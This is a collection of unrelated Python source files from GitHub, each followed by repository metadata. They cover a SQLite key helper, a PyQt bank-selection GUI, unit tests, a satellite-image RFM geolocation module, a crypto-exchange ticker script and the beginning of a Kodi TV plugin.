    def __init__(self, key,content,info, database_path):
        """Upsert helper for the ``os`` table.

        Inserts the (key, content, info) row when no similar key is stored
        yet, otherwise updates the existing row.  A blank *database_path*
        turns construction into a no-op; database errors are printed, not
        raised.
        """
        if database_path!="":
            try:
                self.key = key
                self.database_path =database_path
                if not self.check_key_exists():
                    # Nothing similar stored yet: insert, but only non-empty keys.
                    if len(self.get_all__key(key))==0:
                        if key!="":
                            self.create_key(key,content,info)
                else:
                    self.update_key(key,content,info)
            except Error as e:
                print(e)
def check_key_exists(self):
conn = sqlite3.connect(self.database_path)
cursor = conn.cursor()
cursor.execute("SELECT id FROM os WHERE key like '%'+?+'%'", (self.key,))
exists = cursor.fetchone()
conn.close()
if exists is None:
return False
else:
return True
def get_all__key(self, key):
a=[]
if self.database_path!="":
conn = sqlite3.connect(self.database_path)
if key!="":
cur = conn.cursor()
cur.execute("SELECT * FROM os", () )
rows = cur.fetchall()
for row in rows:
#print("s",row[1])
if key in row[1]:
a.append(row[1])
return a
return a;
def find_key_content(self, key):
conn = sqlite3.connect(self.database_path)
a=[]
if key!='':
cur = conn.cursor()
cur.execute("SELECT * FROM os WHERE key=?", (key,) )
rows = cur.fetchall()
for row in rows:
#print("s",row[2])
return row[2]
if key in row[2]:
a.append(row[2])
return a
def delete_key(self,key):
try:
conn = sqlite3.connect(self.database_path)
cursor = conn.cursor()
cursor.execute("DELETE FROM os WHERE key=?", (key,))
conn.commit()
conn.close()
except Error as e:
print(e)
    def create_key(self,key,content,info):
        """Insert a new (key, content, info) row unless a similar key exists.

        "Similar" means any stored key containing *key* as a substring (see
        get_all__key).  Errors are printed, not raised.
        """
        try:
            conn = sqlite3.connect(self.database_path)
            cursor = conn.cursor()
            # NOTE(review): debug output left in by the author — prints the
            # count of similar keys; consider removing in production.
            print(str(len(self.get_all__key(key))))
            # The same query runs twice (once for the print, once here);
            # only insert when no similar key is stored.
            if len(self.get_all__key(key))==0:
                cursor.execute("INSERT INTO os (key,content,info) VALUES (?,?,?)", (key,content,info))
                conn.commit()
                conn.close()
        except Error as e:
            print(e)
    def update_key(self,key,content,info):
        """Overwrite content and info for every row whose key equals *key*.

        Errors are printed, not raised, matching the rest of the class.
        """
        try:
            conn = sqlite3.connect(self.database_path)
            cursor = conn.cursor()
            cursor.execute("UPDATE os SET content=?,info=? WHERE key=?", (content,info,key))
            conn.commit()
            conn.close()
        except Error as e:
            print(e)
def get_key(self):
conn = sqlite3.connect(self.database_path)
cursor = conn.cursor()
cursor.execute("SELECT key FROM os WHERE key=?", (self.key,))
| dahstar/xwx.ctflab | fldb.py | fldb.py | py | 2,775 | python | en | code | 0 | github-code | 36 |
39939114136 | from PyQt5.QtWidgets import QTableWidgetItem, QLabel, QFileDialog
from PyQt5.QtCore import Qt
from pandas.tests.io.excel.test_xlrd import xlwt
from UI.resultWinUI import *
from algorithm import *
from UI.mainWinUI import *
class BrokerWin(Ui_MainWindow, QtWidgets.QMainWindow):
    """Main window: collects the user's bank-selection criteria (private or
    business client) from the form and opens a ResultWin with the ranking."""

    def __init__(self, parent=None):
        QtWidgets.QWidget.__init__(self, parent)
        self.setupUi(self)
        self.setFixedSize(1100, 540)
        # Wire the form buttons to their handlers.
        self.fizButton.clicked.connect(self.sendInputFiz)
        self.bizButton.clicked.connect(self.sendInputBiz)
        self.selectAll.clicked.connect(self.selectAllFiz)
        self.selectAll_2.clicked.connect(self.selectAllBiz)

    def sendInputFiz(self):
        """Read the private-client form, run the filters and show the results."""
        banks.clear()
        black_list.clear()
        # Optional (checkbox) criteria for private clients.
        for name, box in (
            ('Осуществление автоплатежей', self.autoPayments),
            ('Перевод за рубеж', self.foreignTransfer),
            ('Создание автоперевода', self.createAutoPayments),
            ('Новости системы банка онлайн', self.news),
            ('Автострахование', self.insuranceAuto),
            ('Страхование недвижимости', self.insuranceEstate),
            ('Страхование путешественников', self.insuranceTravellers),
            ('Страхование пассажиров', self.insurancePassangers),
            ('Наличие мобильного приложения', self.mobileApp),
            ('Открытие брокерского счета', self.brokerAccount),
        ):
            optional_fiz[name] = box.isChecked()
        # Ranked (spin-box) criteria for private clients.
        for name, spin in (
            ('Переводы на карту', self.transferToClient_fiz_SpinBox),
            ('Минимальная сумма вклада', self.depositSum_fiz_SpinBox),
            ('Процент по вкладу ', self.persentDepozit_fiz_SpinBox),
            ('Сумма кредита', self.creditSum_fiz_SpinBox),
            ('Ставка кредита', self.percentCredit_fiz_SpinBox),
            ('Переводы на карты по номеру телефона', self.transferNumber_fiz_SpinBox),
        ):
            ranked_fiz[name] = spin.value()
        choose_necessary('fiz')
        choose_ranked('fiz')
        # Map the combo-box text to the sort key understood by ResultWin.
        sort_map = {
            "Пользовательскому рейтингу": "По рейтингу",
            "Кредитным условиям": "по кредиту",
            "Условиям по вкладам": "по вкладу",
        }
        kind_of_sort = self.sort_fiz.currentText()
        if kind_of_sort in sort_map:
            self.Open = ResultWin(sort_map[kind_of_sort])
        self.Open.show()

    def sendInputBiz(self):
        """Read the business-client form, run the filters and show the results."""
        banks.clear()
        black_list.clear()
        # Optional (checkbox) criteria for business clients.
        for name, box in (
            ('Мобильное приложение', self.mobileApp_biz),
            ('Торговый эквайринг', self.trade_biz),
            ('Мобильный эквайринг', self.mobileTrade_biz),
            ('Онлайн-бухгалтерия', self.onlineAccounting_biz),
            ('Проверка контрагентов', self.checkAgents_biz),
            ('Управление корпоративными картами', self.cards_biz),
            ('Финансовая аналитика', self.analitics_biz),
            ('Техподдержка клиентов 24/7', self.clientSupport_biz),
            ('Персональный менеджер', self.personalManager_biz),
        ):
            optional_biz[name] = box.isChecked()
        # Ranked (spin-box) criteria for business clients.
        for name, spin in (
            ('Стоимость обслуживания', self.mounthPayment_biz_SpinBox),
            ('% за снятие наличных', self.cashComission_biz_SpinBox),
            ('% за внесение наличных', self.cashInputComission_biz_SpinBox),
            ('Лимит перевода на карту физ.лица', self.transfer_biz_SpinBox),
        ):
            ranked_biz[name] = spin.value()
        choose_necessary('biz')
        choose_ranked('biz')
        sort_map = {
            "Пользовательскому рейтингу": "По рейтингу",
            "Стоимости обслуживания": "По обслуживанию в месяц",
        }
        kind_of_sort = self.sort_biz.currentText()
        if kind_of_sort in sort_map:
            self.Open = ResultWin(sort_map[kind_of_sort])
        self.Open.show()

    def selectAllFiz(self):
        """Tick every optional-criterion checkbox on the private-client tab."""
        for box in (self.autoPayments, self.foreignTransfer,
                    self.createAutoPayments, self.news, self.insuranceAuto,
                    self.insuranceEstate, self.insuranceTravellers,
                    self.insurancePassangers, self.mobileApp,
                    self.brokerAccount):
            box.setChecked(True)

    def selectAllBiz(self):
        """Tick every optional-criterion checkbox on the business-client tab."""
        for box in (self.mobileApp_biz, self.trade_biz, self.mobileTrade_biz,
                    self.onlineAccounting_biz, self.checkAgents_biz,
                    self.cards_biz, self.analitics_biz,
                    self.clientSupport_biz, self.personalManager_biz):
            box.setChecked(True)
class ResultWin(Ui_ResultWindow, QtWidgets.QMainWindow):
    """Window showing the ranked bank list in a table, with .xls export."""

    def __init__(self, type_of_sort, parent=None):
        """*type_of_sort* is the sort key passed through to special_sort()."""
        QtWidgets.QWidget.__init__(self, parent)
        self.setupUi(self)
        self.setFixedSize(930, 900)
        self.type_of_sort = type_of_sort
        self.showResult()
    def showResult(self):
        """Fill the table with the ranked banks and their info columns."""
        result = special_sort(self.type_of_sort)
        i = 0
        # Website URLs per row, kept for the Excel export (cell widgets are
        # not reachable through the table's model in savefile()).
        self.sites=[]
        information = pd.read_csv("files/banks_info.csv", encoding="cp1251", sep=";")
        for key in result.keys():
            for bank in result[key]:
                self.tableWidget.insertRow(i)
                label = QLabel()
                # Column 0: the sort value (rating / rate / fee).
                item = QTableWidgetItem(str(key))
                item.setTextAlignment(Qt.AlignHCenter)
                self.tableWidget.setItem(i, 0, item)
                # Column 1: bank name; column 2: clickable website link.
                self.tableWidget.setItem(i, 1, QTableWidgetItem(bank))
                self.sites.append(information[bank][0])
                label.setText('<a href="'+information[bank][0]+'">'+information[bank][0]+'</a>')
                label.setOpenExternalLinks(True)
                self.tableWidget.setCellWidget(i, 2, label)
                # Columns 3-5: remaining info rows from banks_info.csv.
                self.tableWidget.setItem(i, 3, QTableWidgetItem(information[bank][1]))
                item=QTableWidgetItem(information[bank][2])
                item.setTextAlignment(Qt.AlignHCenter)
                self.tableWidget.setItem(i, 4, item)
                item = QTableWidgetItem(information[bank][3])
                item.setTextAlignment(Qt.AlignHCenter)
                self.tableWidget.setItem(i, 5, item)
                i += 1
        self.tableWidget.resizeColumnsToContents()
        # NOTE(review): connect() runs on every showResult() call; repeated
        # calls would trigger savefile multiple times per click — confirm
        # showResult is only invoked once (from __init__).
        self.importButton.clicked.connect(self.savefile)
        style = "::section {""background-color: #ffc02b; font:10pt; }"
        self.tableWidget.horizontalHeader().setStyleSheet(style)
    def savefile(self):
        """Export the table (plus the raw site URLs) to an .xls workbook."""
        filename, _ = QFileDialog.getSaveFileName(self, 'Save File', '', ".xls(*.xls)")
        wbk = xlwt.Workbook()
        sheet = wbk.add_sheet("sheet", cell_overwrite_ok=True)
        style = xlwt.XFStyle()
        model = self.tableWidget.model()
        # Row 0: header texts from the table's horizontal header.
        for c in range(model.columnCount()):
            text = model.headerData(c, QtCore.Qt.Horizontal)
            sheet.write(0, c , text, style=style)
        for c in range(model.columnCount()):
            for r in range(model.rowCount()):
                text = model.data(model.index(r, c))
                sheet.write(r + 1, c, text)
        # Column 2 holds QLabel cell widgets (no model data); write the
        # URLs captured in showResult() instead.
        for r in range(model.rowCount()):
            text = self.sites[r]
            sheet.write(r + 1, 2, text)
        wbk.save(filename)
| JuliaZimina/Remote-Banking-Brokers | UI/brokerUI.py | brokerUI.py | py | 8,392 | python | ru | code | 0 | github-code | 36 |
33733841060 | from unittest import TestCase
from A3.SUD import fight_or_run
from unittest.mock import patch
class TestFightOrRun(TestCase):
    """Unit tests for fight_or_run() with console input mocked out."""

    @patch('builtins.input', side_effect=[0])
    def test_fight_or_run_zero(self, mocked_input):
        self.assertEqual(fight_or_run(), 0)

    @patch('builtins.input', side_effect=[1])
    def test_fight_or_run_one(self, mocked_input):
        self.assertEqual(fight_or_run(), 1)

    @patch('builtins.input', side_effect=[10])
    def test_fight_or_run_10(self, mocked_input):
        self.assertEqual(fight_or_run(), 10)

    @patch('builtins.input', side_effect=[100])
    def test_fight_or_run_100(self, mocked_input):
        self.assertEqual(fight_or_run(), 100)
| marlonrenzo/A01054879_1510_assignments | A3/test_fight_or_run.py | test_fight_or_run.py | py | 901 | python | en | code | 0 | github-code | 36 |
17498679617 | import logging
import numpy as np
import sys
import warnings
import affine6p
import geopandas
from typing import List, Optional
from shapely.geometry import Polygon
import geoCosiCorr3D.georoutines.geo_utils as geoRT
import geoCosiCorr3D.geoErrorsWarning.geoErrors as geoErrors
from geoCosiCorr3D.geoCore.core_RFM import RawRFM
class ReadRFM(RawRFM):
    """Load RFM (rational function model) coefficients from a sidecar file
    (.txt/.rpc, .xml, .RPB) or directly from a raster's RPC metadata tags.

    On construction the offset/scale terms and the 20-coefficient
    numerator/denominator lists of the inverse model (and the direct model
    when the source provides one) are populated on ``self``.
    """

    def __init__(self, rfm_file):
        super().__init__()
        self.rfm_file = rfm_file
        self._ingest()

    def _ingest(self):
        """Dispatch to the reader matching the file extension (case-insensitive)."""
        name = self.rfm_file.lower()
        if name.endswith('xml'):
            logging.info("RFM file format: xml")
            self.RFM_Read_fromXML(self.rfm_file)
        elif name.endswith('rpb'):
            # Bug fix: the original tested ``.lower().endswith('RPB')``, which
            # can never be true, so RPB files silently fell through here.
            logging.info("RFM file format: RPB")
            self.RFM_Read_fromRPB(self.rfm_file)
        elif name.endswith(('txt', 'rpc')):
            self.RFM_Read_fromTXT(self.rfm_file)
        elif name.endswith(('tif', 'ntf', 'jp2')):
            logging.info("RFM file format: Raster")
            self.RFM_Read_fromRaster(self.rfm_file)
        else:
            # Unknown extension: fall back to the plain-text reader.
            try:
                self.RFM_Read_fromTXT(self.rfm_file)
            except Exception:
                raise IOError(f'RFM file:{self.rfm_file} is not valid')

    def parse_file(self, param, lines):
        """Return the float following ``<param>:`` in *lines* (last match wins).

        Exits the process with an error message when *param* is not found,
        preserving the original behaviour.
        """
        from re import search
        val = None
        for line_ in lines:
            if search(param, line_):
                val = float(line_.split(":")[1].split()[0])
        if val is None:
            sys.exit("ERROR in reading " + param + " from RFM txt file!")
        return val

    def RFM_Read_fromTXT(self, rfm_txt_file):
        """Populate scales, offsets and inverse-model coefficients from a
        plain-text RPC file (``KEY: value`` lines)."""
        with open(rfm_txt_file) as f:
            fileContent = f.read()
        lines = fileContent.split('\n')
        self.linOff = self.parse_file(param="LINE_OFF", lines=lines)
        self.colOff = self.parse_file(param="SAMP_OFF", lines=lines)
        self.latOff = self.parse_file(param="LAT_OFF", lines=lines)
        self.lonOff = self.parse_file(param="LONG_OFF", lines=lines)
        # Bug fix: altOff was read from HEIGHT_SCALE; HEIGHT_OFF is the
        # correct key (the raster reader below uses HEIGHT_OFF for altOff).
        self.altOff = self.parse_file(param="HEIGHT_OFF", lines=lines)
        self.linScale = self.parse_file(param="LINE_SCALE", lines=lines)
        self.colScale = self.parse_file(param="SAMP_SCALE", lines=lines)
        self.latScale = self.parse_file(param="LAT_SCALE", lines=lines)
        self.lonScale = self.parse_file(param="LONG_SCALE", lines=lines)
        self.altScale = self.parse_file(param="HEIGHT_SCALE", lines=lines)
        # Inverse model: 20 numerator/denominator terms per image coordinate.
        for i in range(20):
            self.linNum[i] = self.parse_file(param="LINE_NUM_COEFF_" + str(i + 1) + ":", lines=lines)
            self.linDen[i] = self.parse_file(param="LINE_DEN_COEFF_" + str(i + 1) + ":", lines=lines)
            self.colNum[i] = self.parse_file(param="SAMP_NUM_COEFF_" + str(i + 1) + ":", lines=lines)
            self.colDen[i] = self.parse_file(param="SAMP_DEN_COEFF_" + str(i + 1) + ":", lines=lines)
        # TODO: check for direct model
        return

    def RFM_Read_fromXML(self, rfm_xml_file):
        """Placeholder: XML RPC parsing is not implemented yet."""
        logging.info("--- Read RFM form xML ---")
        logging.info("--- Future work ---")
        geoErrors.erNotImplemented(routineName="Read RFM from XML")
        return

    def RFM_Read_fromRPB(self, rpb_file):
        """Placeholder: RPB parsing is not implemented yet."""
        logging.info("--- Read RFM form RPB ---")
        logging.info("--- Future work ---")
        geoErrors.erNotImplemented(routineName="Read RFM from RPB")
        return

    def RFM_Read_fromRaster(self, raster_file):
        """Read the RPC coefficients from the raster's metadata tags
        (via GDAL through georoutines)."""
        rasterInfo = geoRT.cRasterInfo(raster_file)
        if rasterInfo.rpcs:
            rfmInfo = rasterInfo.rpcs
            # Scale and offset terms.
            self.altOff = float(rfmInfo["HEIGHT_OFF"])
            self.altScale = float(rfmInfo["HEIGHT_SCALE"])
            self.latOff = float(rfmInfo["LAT_OFF"])
            self.latScale = float(rfmInfo["LAT_SCALE"])
            self.lonOff = float(rfmInfo["LONG_OFF"])
            self.lonScale = float(rfmInfo["LONG_SCALE"])
            self.linOff = float(rfmInfo["LINE_OFF"])
            self.linScale = float(rfmInfo["LINE_SCALE"])
            self.colOff = float(rfmInfo["SAMP_OFF"])
            self.colScale = float(rfmInfo["SAMP_SCALE"])
            # Inverse model coefficients.
            self.linNum = list(map(float, rfmInfo['LINE_NUM_COEFF'].split()))
            self.linDen = list(map(float, rfmInfo['LINE_DEN_COEFF'].split()))
            self.colNum = list(map(float, rfmInfo['SAMP_NUM_COEFF'].split()))
            self.colDen = list(map(float, rfmInfo['SAMP_DEN_COEFF'].split()))
            # Direct model coefficients, when the vendor supplied them.
            if 'LON_NUM_COEFF' in rfmInfo:
                self.lonNum = list(map(float, rfmInfo['LON_NUM_COEFF'].split()))
                self.lonDen = list(map(float, rfmInfo['LON_DEN_COEFF'].split()))
                self.latNum = list(map(float, rfmInfo['LAT_NUM_COEFF'].split()))
                self.latDen = list(map(float, rfmInfo['LAT_DEN_COEFF'].split()))
        else:
            sys.exit(f'RPCs not found in the raster {raster_file} metadata')
        return
class RFM(ReadRFM):
    """Rational Function Model: ground<->image projections built on the
    coefficients loaded by ReadRFM, plus footprint/GSD/geotransform helpers."""

    def __init__(self, rfm_file: Optional[str] = None, debug: bool = False):
        """Initialise an (optionally empty) model; *rfm_file* is parsed when given."""
        self.init_RFM()
        if rfm_file is not None:
            super().__init__(rfm_file)
        self.debug = debug
        if self.debug:
            logging.info(self.__repr__())

    def Ground2Img_RFM(self, lon, lat, alt: List = None, normalized=False, demInfo=None, corrModel=np.zeros((3, 3))):
        """
        Apply the inverse RFM model to convert ground to image coordinates.

        Args:
            lon: longitude(s) of the input 3D point(s): float or list
            lat: latitude(s) of the input 3D point(s): float or list
            alt: altitude(s) of the input 3D point(s): float or list
            normalized: when True, return normalized image coordinates
            demInfo: optional DEM (altitude interpolation is still a TODO)
            corrModel: 3x3 correction matrix applied in normalized image space
        Returns:
            float or list: horizontal image coordinate(s) (column index, i.e. x)
            float or list: vertical image coordinate(s) (row index, i.e. y)
        """
        lon = np.asarray(lon)
        lat = np.asarray(lat)
        alt = np.asarray([] if alt is None else alt)
        # Bug fix: test for *presence* of altitudes (size) rather than their
        # truthiness — the original np.array(alt).any() discarded legitimate
        # all-zero (sea-level) altitudes and, when a DEM was supplied, left
        # ``alt`` as an empty array.
        if alt.size == 0:
            if demInfo is not None:
                warnings.warn("INTERPOLATE FROM DEM --> TODO")
                logging.warning("INTERPOLATE FROM DEM --> TODO")
            else:
                warnings.warn("NO alt values and no DEM: alt will be set to:{}".format(self.altOff))
                logging.warning("NO alt values and no DEM: alt will be set to:{}".format(self.altOff))
            alt = np.ones(lon.shape) * self.altOff
        # Normalize ground coordinates before evaluating the polynomials.
        lonN = (lon - self.lonOff) / self.lonScale
        latN = (lat - self.latOff) / self.latScale
        altN = (alt - self.altOff) / self.altScale
        colN = self.build_RFM(num=self.colNum, den=self.colDen, x=latN, y=lonN, z=altN)
        linN = self.build_RFM(num=self.linNum, den=self.linDen, x=latN, y=lonN, z=altN)
        if not np.all(corrModel == 0):
            colN, linN = self.apply_correction(corrModel=corrModel, colN=colN, linN=linN)
        if normalized:
            return colN, linN
        col = colN * self.colScale + self.colOff
        row = linN * self.linScale + self.linOff
        return col, row

    def Img2Ground_RFM(self, col, lin,
                       altIni: Optional[List] = None,
                       demInfo: Optional[geoRT.cRasterInfo] = None,
                       corrModel=np.zeros((3, 3)),
                       normalized=False):
        """
        Apply the direct RFM model to convert image to ground coordinates.

        Args:
            col: x-image coordinate(s) of the input point(s): float or list
            lin: y-image coordinate(s) of the input point(s): float or list
            altIni: initial altitude(s) of the input point(s): float or list
            demInfo: optional DEM used to refine altitudes after a first pass
            corrModel: 3x3 correction matrix (normalized image space)
            normalized: when True, return normalized lon/lat and None altitude
        Returns:
            longitude(s), latitude(s), altitude(s); altitude is None when
            *normalized* is True.
        Raises:
            ValueError: when *altIni* is a non-empty list whose length does
                not match *col*/*lin*.
        """
        if altIni is None:
            altIni = []
        if isinstance(altIni, list):
            if len(altIni) == 0:
                # Default the initial altitude(s) to the model's offset.
                if isinstance(col, list) and isinstance(lin, list):
                    altIni = len(col) * [self.altOff]
                else:
                    altIni = self.altOff
            elif len(altIni) != len(col) or len(altIni) != len(lin):
                # Bug fix: the original built this exception without raising it.
                raise ValueError("Invalid Initial Altitude values !")
        col = np.asarray(col)
        lin = np.asarray(lin)
        altIni_ = np.asarray(altIni)
        # Normalize input image coordinates.
        colN = (col - self.colOff) / self.colScale
        linN = (lin - self.linOff) / self.linScale
        altIniN = (altIni_ - self.altOff) / self.altScale
        if self.lonNum == [np.nan] * 20:
            # No direct coefficients available: invert the inverse model numerically.
            if self.debug:
                logging.warning("Computing Direct model ....")
            lonN, latN = self.ComputeDirectModel(colN=colN, linN=linN, altN=altIniN, corrModel=corrModel)
        else:
            lonN = self.build_RFM(num=self.lonNum, den=self.lonDen, x=linN, y=colN, z=altIniN)
            latN = self.build_RFM(num=self.latNum, den=self.latDen, x=linN, y=colN, z=altIniN)
        if normalized:
            return lonN, latN, None
        lon = lonN * self.lonScale + self.lonOff
        lat = latN * self.latScale + self.latOff
        alt = altIni
        if demInfo is not None:
            # Refine altitudes from the DEM at the first-pass (lon, lat), then
            # recompute the ground coordinates once with the refined values.
            # TODO: iterate until convergence / coordinates stop changing.
            alt = []
            if isinstance(lon, np.ndarray) and isinstance(lat, np.ndarray):
                for lonVal, latVal, altValIni in zip(lon, lat, altIni):
                    altVal = self.ExtractAlt(lonVal, latVal, demInfo)
                    # An extracted 0 is treated as "no data": keep the initial value.
                    if altVal == 0:
                        altVal = altValIni
                    alt.append(altVal)
            else:
                altVal = self.ExtractAlt(lon, lat, demInfo)
                if altVal == 0:
                    altVal = altIni
                alt = altVal
            alt = np.asarray(alt)
            # Second pass with refined, normalized altitudes.
            colN = (col - self.colOff) / self.colScale
            linN = (lin - self.linOff) / self.linScale
            altN = (alt - self.altOff) / self.altScale
            if self.lonNum == [np.nan] * 20:
                lonN, latN = self.ComputeDirectModel(colN=colN, linN=linN, altN=altN, corrModel=corrModel)
            else:
                lonN = self.build_RFM(num=self.lonNum, den=self.lonDen, x=linN, y=colN, z=altN)
                latN = self.build_RFM(num=self.latNum, den=self.latDen, x=linN, y=colN, z=altN)
            lon = lonN * self.lonScale + self.lonOff
            lat = latN * self.latScale + self.latOff
        return lon, lat, alt

    def get_geoTransform(self):
        """Estimate an affine geotransform [x0, dx, rx, y0, ry, dy] from the
        image corners projected to the ground at the mean scene altitude."""
        h = int(self.linOff * 2)
        w = int(self.colOff * 2)
        BBoxPix = [[0, 0],
                   [0, h],
                   [w, h],
                   [w, 0],
                   [0, 0]]
        z = self.altOff
        lons, lats, _ = self.Img2Ground_RFM(col=[0, 0, w, w, 0],
                                            lin=[0, h, h, 0, 0],
                                            altIni=[z, z, z, z, z],
                                            normalized=False)
        BBoxMap = [[lon_, lat_] for lon_, lat_ in zip(lons, lats)]
        trans = affine6p.estimate(origin=BBoxPix, convrt=BBoxMap)
        mat = trans.get_matrix()  # homogeneous representation of the affine transform
        geo_transform = [mat[0][-1], mat[0][0], mat[0][1], mat[1][-1], mat[1][0], mat[1][1]]
        return geo_transform

    def compute_footprint(self, corr_model: Optional[np.ndarray] = None,
                          dem_info: Optional[geoRT.cRasterInfo] = None) -> [Polygon, geopandas.GeoDataFrame]:
        """Project the image corners to the ground and return the footprint as
        a shapely Polygon plus a single-row WGS84 GeoDataFrame."""
        h = int(self.linOff * 2)
        w = int(self.colOff * 2)
        z = self.altOff
        if corr_model is None:
            corr_model = np.zeros((3, 3))
        lons, lats, _ = self.Img2Ground_RFM(col=[0, 0, w, w, 0],
                                            lin=[0, h, h, 0, 0],
                                            altIni=[z, z, z, z, z],
                                            normalized=False,
                                            corrModel=corr_model,
                                            demInfo=dem_info)
        fp_poly_geom = Polygon(zip(lons, lats))
        gpd_polygon = geopandas.GeoDataFrame(index=[0], crs='epsg:4326', geometry=[fp_poly_geom])
        return fp_poly_geom, gpd_polygon

    def get_GSD(self):
        """Estimate the (x, y) ground sample distance by projecting the image
        centre and a one-pixel-offset neighbour into the scene's UTM zone."""
        h = self.linOff * 2
        w = self.colOff * 2
        center = (int(h / 2), int(w / 2))
        center_plus = (center[0] + 1, center[1] + 1)
        prjCenter = self.Img2Ground_RFM(col=center[1], lin=center[0])
        prjCenter_plus = self.Img2Ground_RFM(col=center_plus[1], lin=center_plus[0])
        # Pick the UTM zone of the scene centre so distances are metric.
        epsgCode = geoRT.ComputeEpsg(lon=prjCenter[0], lat=prjCenter[1])
        centerCoords = geoRT.ConvCoordMap1ToMap2_Batch(X=[prjCenter[1], prjCenter_plus[1]],
                                                       Y=[prjCenter[0], prjCenter_plus[0]],
                                                       targetEPSG=epsgCode)
        xGSD = np.abs(centerCoords[0][0] - centerCoords[0][1])
        yGSD = np.abs(centerCoords[1][0] - centerCoords[1][1])
        return (xGSD, yGSD)

    def get_altitude_range(self, scaleFactor=1):
        """Return [min, max] plausible scene altitude derived from the model's
        altitude offset and scale, optionally widened by *scaleFactor*."""
        minAlt = self.altOff - scaleFactor * self.altScale
        maxAlt = self.altOff + scaleFactor * self.altScale
        return [minAlt, maxAlt]
if __name__ == '__main__':
    # TODO add to unit/functional tests
    # Manual smoke test against a sample scene on the developer's machine.
    img = '/home/cosicorr/0-WorkSpace/3-PycharmProjects/geoCosiCorr3D/geoCosiCorr3D/Tests/3-geoOrtho_Test/Sample/Sample1/SPOT2.TIF'
    rfm = RFM(img, debug=True)
    print(f'attitude range:{rfm.get_altitude_range()}')
    print(f'GSD:{rfm.get_GSD()}')
    print(f'geoTransform:{rfm.get_geoTransform()}')
| SaifAati/Geospatial-COSICorr3D | geoCosiCorr3D/geoRFM/RFM.py | RFM.py | py | 15,569 | python | en | code | 37 | github-code | 36 |
import json
from bitbnspy import bitbns
# from bitbnspy import bitbns
import config
# API credentials come from a local, uncommitted config module.
key = config.apiKey
secretKey = config.secret
# Authenticated client (currently only exercised by the commented-out calls).
bitbnsObj = bitbns(key, secretKey)
# print('APIstatus: =', bitbnsObj.getApiUsageStatus)
# getPairTicker = bitbnsObj.getTickerApi('DOGE')
# print(' PairTicker : ', getPairTicker)
print('====================================')
# dumpBid = json.dumps(getPairTicker)
# loadBid = json.loads(dumpBid)
# getBid = loadBid['highest_buy_bid']
# print('highest buy: ', loadBid)
print('====================================')
# OpenOrders = bitbnsObj.listOpenOrders('DOGE')
# print(OpenOrders)
# NOTE(review): bitbnsObj is re-bound here to the unauthenticated public
# client, discarding the authenticated one above — confirm this is intended.
bitbnsObj = bitbns.publicEndpoints()
getTickers = bitbnsObj.fetchTickers()
# Round-trip through JSON; presumably normalises the response to plain
# dict/list types — verify against the bitbnspy return type.
dumpTickers = json.dumps(getTickers)
loadTickers = json.loads(dumpTickers)
print(loadTickers)
| npenkar/botCode | BitbnsPy/botbns.py | botbns.py | py | 788 | python | en | code | 0 | github-code | 36 |
9659602575 | import numpy
from abstract_model import Model
from asc.core.time_series import TimeSeries
class BrownModel(Model):
    r"""Brown's simple exponential smoothing model.

    The smoothed series `\hat{m}_t` follows the recursion

    .. MATH::
        \hat{m}_1 = X_1, \qquad
        \hat{m}_t = a X_t + (1-a)\hat{m}_{t-1}

    for a smoothing constant `a \in [0, 1]`, chosen by trial and error.
    """

    obligatory_parameters = ("alpha", )

    def __init__(self, data, alpha=0.3):
        r"""Create a Brown model over *data* (a TimeSeries) with smoothing
        constant *alpha* (float in [0, 1])."""
        # NOTE(review): attribute name mimics name mangling for the parent
        # Model class but uses a single underscore; kept verbatim because the
        # framework may rely on it — confirm against abstract_model.Model.
        self._Model_forecast_offset = 1
        super(BrownModel, self).__init__({"alpha": alpha}, data)

    @property
    def alpha(self):
        r"""Smoothing constant of this model (float)."""
        return self.__alpha

    @alpha.setter
    def alpha(self, value):
        r"""Set the smoothing constant.

        :raise: ValueError when *value* lies outside the interval [0, 1].
        """
        if not 0 <= value <= 1:
            raise ValueError("alpha must be a number from the interval [0,1].")
        self.__alpha = value

    @property
    def estimated_series(self):
        r"""Smoothed version (TimeSeries) of the data the model was built from."""
        return self.__estimated_series

    @property
    def forecast_offset(self):
        r"""Time after which the model starts estimating consecutive values.

        Always 1 for Brown's model; present for abstract-model compatibility.
        """
        return 1

    def get_parameter(self, param):
        r"""Return the value of *param*; only "alpha" is recognised.

        :raise: ValueError for any other parameter name.
        """
        if param != "alpha":
            raise ValueError("Unknown parameter %s." % (param))
        return self.alpha

    def set_parameter(self, param, value):
        r"""Assign *value* to *param*; only "alpha" is recognised.

        :raise: ValueError for any other parameter name, or when *value*
            lies outside [0, 1].
        """
        if param != "alpha":
            raise ValueError("Unknown parameter %s." % (param))
        self.alpha = value

    def recalculate_model(self):
        r"""Recompute the smoothed values from the model's empirical data."""
        n = len(self.data)
        smoothed = numpy.zeros(n - 1)
        smoothed[0] = self.data[0]
        # m_t = a * X_t + (1 - a) * m_{t-1}
        for k in range(1, n - 1):
            smoothed[k] = self.alpha * self.data[k] + \
                (1 - self.alpha) * smoothed[k - 1]
        self.components = {}
        self.components["smoothened"] = self.__estimated_series = \
            TimeSeries(smoothed)
        self.components["residues"] = self.goodness_info.errors
| dexter2206/asc | source/asc-0.1/src/asc/models/brown_model.py | brown_model.py | py | 4,868 | python | en | code | 2 | github-code | 36 |
16389175671 | # -*- coding: utf-8 -*-
import os
import sys
import xbmcgui
import xbmcplugin
import xbmcaddon
from urllib.parse import parse_qsl
from libs.utils import get_url, check_settings
from libs.session import Session
from libs.channels import Channels, manage_channels, list_channels_edit, list_channels_list_backups, edit_channel, delete_channel, change_channels_numbers
from libs.channels import list_channels_groups, add_channel_group, edit_channel_group, edit_channel_group_list_channels, edit_channel_group_add_channel, edit_channel_group_add_all_channels, edit_channel_group_delete_channel, select_channel_group, delete_channel_group
from libs.live import list_live
from libs.archive import list_archive, list_archive_days, list_program
from libs.stream import play_live, play_archive, play_catchup
from libs.settings import list_settings, list_devices, remove_device
from libs.iptvsc import generate_playlist, generate_epg
if len(sys.argv) > 1:
    # Kodi invokes the plugin as: script.py <handle> <querystring>; the handle
    # identifies the directory listing being populated by xbmcplugin calls.
    _handle = int(sys.argv[1])
def main_menu():
    """Render the add-on's root directory: Live TV, Archive and (unless
    hidden by the 'hide_settings' setting) a Settings entry."""
    addon = xbmcaddon.Addon()
    icons_dir = os.path.join(addon.getAddonInfo('path'), 'resources','images')
    # Live TV entry (localized string 300111).
    list_item = xbmcgui.ListItem(label = addon.getLocalizedString(300111))
    url = get_url(action='list_live', label = addon.getLocalizedString(300111))
    list_item.setArt({ 'thumb' : os.path.join(icons_dir , 'livetv.png'), 'icon' : os.path.join(icons_dir , 'livetv.png') })
